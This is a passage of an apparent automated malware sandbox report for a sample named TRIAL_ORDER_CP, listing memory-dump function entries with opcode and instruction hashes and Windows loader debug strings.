                                          • Instruction Fuzzy Hash: 3D017B76A083586FF6215E10C848EC67B65FF04395F440478E501DF863CB20FC81CE94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524
                                          • Opcode ID: 0d911e4a6ba86e3c0f27ccdbfac49530843414953848625870e566896ecf44fd
                                          • Instruction ID: bc255809ae1f491a4f13b315ba805dca7474ef78d41ce72b9135e159435d735c
                                          • Opcode Fuzzy Hash: 0d911e4a6ba86e3c0f27ccdbfac49530843414953848625870e566896ecf44fd
                                          • Instruction Fuzzy Hash: CD328AB45083218FD7248F14C480B2AFBE5EF88744F584A3EF999DB690E774D984CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 0403cff7a2bca90c2ea7ad6659dd5c2de20d45362720e4e511d8a1093add3ffc
                                          • Instruction ID: 2bc33ba1a0977d8729c4c1964488a5aac36754e845b94a76545e78457954c91a
                                          • Opcode Fuzzy Hash: 0403cff7a2bca90c2ea7ad6659dd5c2de20d45362720e4e511d8a1093add3ffc
                                          • Instruction Fuzzy Hash: B0318931A11B12AFE7559B64CA90F8AFBA9FF44694F044136E95087F50EB74E831CBD0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: e08a07c92acd7b0ae09222808065dacf077c46924d87d5fb136863580b49244a
                                          • Instruction ID: f03777694b5ab24dcd1ddee468842ade30f90b7222a8f56d0853956ba0ef6e65
                                          • Opcode Fuzzy Hash: e08a07c92acd7b0ae09222808065dacf077c46924d87d5fb136863580b49244a
                                          • Instruction Fuzzy Hash: 10616CB1E053599FEB15CFA8C840BADB7B8FB44740F54403AE549EB661EB31D900CB61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$
                                          • API String ID: 3446177414-233714265
                                          • Opcode ID: daf257a4d4e6df563e52a340a676f1862c3b63fb03c939ae7511cd7dccfa8ed0
                                          • Instruction ID: 40c9a9ff004888d39b3ff9fc67c9dc928f4242a2b440679bfc71256c4400b4f4
                                          • Opcode Fuzzy Hash: daf257a4d4e6df563e52a340a676f1862c3b63fb03c939ae7511cd7dccfa8ed0
                                          • Instruction Fuzzy Hash: 8361AAB5E01B89CFEB20CFA4C684F99BBB1FF04304F144679D519ABA91CB74A941CB90
                                          Strings
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 33B1A229
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 33B1A21B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 4bc1eb5279c9a280d2cd03e81f10a5221da81d2504da746d48566d80270b2169
                                          • Instruction ID: 27c91ca6e8ab8c7c7e70dd935e9bfb9701d6b25b53091edfc764652f77a74740
                                          • Opcode Fuzzy Hash: 4bc1eb5279c9a280d2cd03e81f10a5221da81d2504da746d48566d80270b2169
                                          • Instruction Fuzzy Hash: 8D41BCB5E00755DFEB01CF99C440B59B7B4EF85750F1840B5E894DB2A4E636E920CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: 76ef4fe00f930195bdda8b6f1a14bce5fc3f8576c6b3fe4125957f3726e4fdb4
                                          • Instruction ID: bb8a194b5c05cbce75fad439b4946c0f5663268bc14220051fe1b836312a341e
                                          • Opcode Fuzzy Hash: 76ef4fe00f930195bdda8b6f1a14bce5fc3f8576c6b3fe4125957f3726e4fdb4
                                          • Instruction Fuzzy Hash: 6231AD7560CB919BE301CB69D880B1AB7E4EF85754F080979FD58CB390EB35D905CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@
                                          • API String ID: 0-380025441
                                          • Opcode ID: 359d298145a37ed0e182d57fde37a6a330ef77884dbdf7a79558c819db7b8875
                                          • Instruction ID: 5198e829e8c501587d66e15c9baf4d9721de821255a433f1eee37bf9d006d7a6
                                          • Opcode Fuzzy Hash: 359d298145a37ed0e182d57fde37a6a330ef77884dbdf7a79558c819db7b8875
                                          • Instruction Fuzzy Hash: D031A1B5909301AFD750CF28C880A5BBBE8FB85654F480A3EF9D887250D734DD18DBA6
                                          Strings
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 33B8289A
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33B8289F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 111a3b90e0c533bc150ddfa726b46274835505d289dd4cfe9a2c17d5da8a7cba
                                          • Instruction ID: 351dd1f85799d01574707c2afdfd7ab78757970609baaebb29d91757e4a01731
                                          • Opcode Fuzzy Hash: 111a3b90e0c533bc150ddfa726b46274835505d289dd4cfe9a2c17d5da8a7cba
                                          • Instruction Fuzzy Hash: D2112972B00314BFFB158A48DD41FAB76A8DFC4790F58843AB908DF244DA75CD0097A4
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: #%u
                                          • API String ID: 0-232158463
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 79fbc38385b610c3988feb9ec09a7835d72fb9ee5e3ee6a60cf33d3ec163daf8
                                          • Instruction ID: 3e196f86ae5af92ff26418a6b786ce0b1dc7680cefcac6cb8c673f8280f5f88c
                                          • Opcode Fuzzy Hash: 79fbc38385b610c3988feb9ec09a7835d72fb9ee5e3ee6a60cf33d3ec163daf8
                                          • Instruction Fuzzy Hash: D031C3FE901659AFEB16CB58C845E6FF7B8EB80760F154539E904AB650D7309E04C7E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a6ee5842fbab1cf46c7e5561e7a16fd3eba5999320f6e3c3cf653caffa532737
                                          • Instruction ID: b9951e6dc96931cae15bb53b5d263c4f53b2db9a7b1c73971c95121e5a017b49
                                          • Opcode Fuzzy Hash: a6ee5842fbab1cf46c7e5561e7a16fd3eba5999320f6e3c3cf653caffa532737
                                          • Instruction Fuzzy Hash: BD42B175A002268FDB04CF59C4919AEB7B6FF89358F18857DE456AB341DB34EC42CB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9656db246f80d66994d80b8cdd802a788695fdfc7b3268b152cc45af9a8025e5
                                          • Instruction ID: 1990649c08d5ea36703575ff5139f73b047a395f777763de2466418ccda0979e
                                          • Opcode Fuzzy Hash: 9656db246f80d66994d80b8cdd802a788695fdfc7b3268b152cc45af9a8025e5
                                          • Instruction Fuzzy Hash: 7A32B1B6E01229DBDF14CFA8C890BAEBBB1FF85754F190139E845AB394D7319911CB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f81cadcda9c7bd329f47c36ca8ab64397ddcd667ea2a5f31ea890f7932e13e0
                                          • Instruction ID: 531a8eab8fd35b10b132776c674e74ce6c7c413015645fda068d602995580fcf
                                          • Opcode Fuzzy Hash: 9f81cadcda9c7bd329f47c36ca8ab64397ddcd667ea2a5f31ea890f7932e13e0
                                          • Instruction Fuzzy Hash: FF32C074A007688FEB24CF69C850BAEBBF6EF84744F54413DD8999B684DB34E941CB50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9da4148282a594379b9b9148a4fefd3e6f56a0dbca41d11a38cd922df108c29
                                          • Instruction ID: f67ee6946ffa710130c62a6f759f05503c57333168039d8e0d0b976faa640d7f
                                          • Opcode Fuzzy Hash: b9da4148282a594379b9b9148a4fefd3e6f56a0dbca41d11a38cd922df108c29
                                          • Instruction Fuzzy Hash: B6229175A002268FDB49CF58C490AAEB7B6FF88354F18817DD855EB345DB34E942CB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf3a9110f48324a516e96e26c6e907ede9996ecaef0f0aa56a415f55a81af7c2
                                          • Instruction ID: 1a4ecf110c480c250737ea452b8bb94bbe7596eee607d3a0060fc375bb77d6b0
                                          • Opcode Fuzzy Hash: cf3a9110f48324a516e96e26c6e907ede9996ecaef0f0aa56a415f55a81af7c2
                                          • Instruction Fuzzy Hash: 1AD1E072A0072A9BEB04CF65C880EAE7BB5FF84349F494139E955DB291EB30DA45CF50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0396fcb9f3c7e09c93767e495baed97fdd7e94aea6eb64663bc9d582510b2b9c
                                          • Instruction ID: 263eb8e29e1061e0abc8b19b7b19bce95dd259efbff892918ffd7f24a2cdc312
                                          • Opcode Fuzzy Hash: 0396fcb9f3c7e09c93767e495baed97fdd7e94aea6eb64663bc9d582510b2b9c
                                          • Instruction Fuzzy Hash: C3C1A475E003269BEB14CF59C840BADB7B5EF44394F58827DE868AB290D770E952CBD0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ee81fb718893236c7ef46414f6d2da655e5a0911935d45da85a44e3890846de
                                          • Instruction ID: 6f7e40cbd6816c2b1d5443516707059a249d0c3ffe52c8812ff3d08e8f613640
                                          • Opcode Fuzzy Hash: 3ee81fb718893236c7ef46414f6d2da655e5a0911935d45da85a44e3890846de
                                          • Instruction Fuzzy Hash: 81D1E2B5A012149FEB51CF68C980B9A7BE9FF09340F1441BAED49DF216EB31D945CBA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45f7c7525e9e8ed69edd963cb10cdf997f832592670714ca425982797bd27aee
                                          • Instruction ID: 6cea625418b49f767df18f60d840a10e717b345d4022fe55fd07772f53331497
                                          • Opcode Fuzzy Hash: 45f7c7525e9e8ed69edd963cb10cdf997f832592670714ca425982797bd27aee
                                          • Instruction Fuzzy Hash: FDC1F4B5A052648FEB04CF18C490B69BBE1FB88B44F594379E889DF292D774DA41CB60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 335a5cf1731f8fc79a8410c724ee3b54f5f5c4df6b2f3ac042080f78c22b8836
                                          • Instruction ID: 48852c84d1e92db65ee7e731b4d1cedfc2b9d862fbee84b775dc7914f6fdf7cd
                                          • Opcode Fuzzy Hash: 335a5cf1731f8fc79a8410c724ee3b54f5f5c4df6b2f3ac042080f78c22b8836
                                          • Instruction Fuzzy Hash: 5DC130B1D003499FDB15CFA9D880A9EBBF4FB48744F15416AE41AEB750EB34A911CF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bcc1cfbbaf82fde32a67f9d9913a1ed3bdb472a8cf7744a4d819e83eeba90ea
                                          • Instruction ID: 9b30e2283d42b48f4e8d2db4a2b1139aa1e45ec025a75a15abc4de319329e47c
                                          • Opcode Fuzzy Hash: 6bcc1cfbbaf82fde32a67f9d9913a1ed3bdb472a8cf7744a4d819e83eeba90ea
                                          • Instruction Fuzzy Hash: D1C137746083408FE364CF15C494BAAB7E9FF88344F44496DE999D7291EB74EA04CF92
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d13edbacc12166139fb9c68dbd94960b7bd3478e8230086da1e68b9e222c528d
                                          • Instruction ID: 8d78d36c25f7ba1e254f4f01c036d66b9904e39007163b400f9a2efffe632b67
                                          • Opcode Fuzzy Hash: d13edbacc12166139fb9c68dbd94960b7bd3478e8230086da1e68b9e222c528d
                                          • Instruction Fuzzy Hash: A0B17074A002658BEB64CF64C890BADB7B5EF44744F0485FAD54AEB651EB30DD85CF20
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7349094954c1d9cc9305724d141ffc3703b5a4a195cfa46627ebc3d85e5f533
                                          • Instruction ID: 1b3ff934a4bd669af01f36ce6f9ea016b32961c4ff50166e30852d224e8e2b18
                                          • Opcode Fuzzy Hash: e7349094954c1d9cc9305724d141ffc3703b5a4a195cfa46627ebc3d85e5f533
                                          • Instruction Fuzzy Hash: 5AA1AAB2A04751AFD711CF28D980F1ABBE9FB48704F850A39E589DBA50C734ED91CB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a540da32b47fc30596de4a90ce376fd0ac6abf5a78e92c1be9b85cc439e4ab7
                                          • Instruction ID: 508e66fa56c825299eb5ff7ae1af2ee46c5a3308d8d71c1058350bab807bd4df
                                          • Opcode Fuzzy Hash: 3a540da32b47fc30596de4a90ce376fd0ac6abf5a78e92c1be9b85cc439e4ab7
                                          • Instruction Fuzzy Hash: C5912575E00724CFE7119B6AC480FAD7BA5EF88750F494279E868DB660DB34DE01CBA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32d8254f5bbd1141f82e822556825af248ea18eee2f763a08980e0121058d93a
                                          • Instruction ID: 958f140eda50010a8a174fc81d0b78cc9fac121bf31a5caf1c37e4607233a3f9
                                          • Opcode Fuzzy Hash: 32d8254f5bbd1141f82e822556825af248ea18eee2f763a08980e0121058d93a
                                          • Instruction Fuzzy Hash: 89B15CB8D003958FEB24DF18D4407A9B7E0FF88398F54417AD862AB295DB34D992DF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3989a6c3545e0ccce9cc390eece68c7ee3c6e2656f5bb8028aeba0672944bd3
                                          • Instruction ID: 05e295cf6afc7418c29355a8e31b2cd02871801644df9aed383beb1aaa06fc99
                                          • Opcode Fuzzy Hash: a3989a6c3545e0ccce9cc390eece68c7ee3c6e2656f5bb8028aeba0672944bd3
                                          • Instruction Fuzzy Hash: E5A13775A08342CFD314CF28D481A1ABBE9FF88744F24496DF5959B350EB30EA55CB92
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                          • Instruction ID: 2d3f9f4352396f08db83d1cf47fe739734cefaa3ae0c0765a61f8a21f22bd988
                                          • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                          • Instruction Fuzzy Hash: 6971C275E802AA9BDF24CF55D480AAFB7BDEF84790F58413AD841EB240E774DA41CB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                          • Instruction ID: 9f1100e814f8aef4dd12a9d0e7c10f853c966effe5222f5349e072a34cd1b14c
                                          • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                          • Instruction Fuzzy Hash: DA816E75A00319DFDB09CF99C890AAEB7B6FF84310F198179D855AB394DB74EA02CB50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                           • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
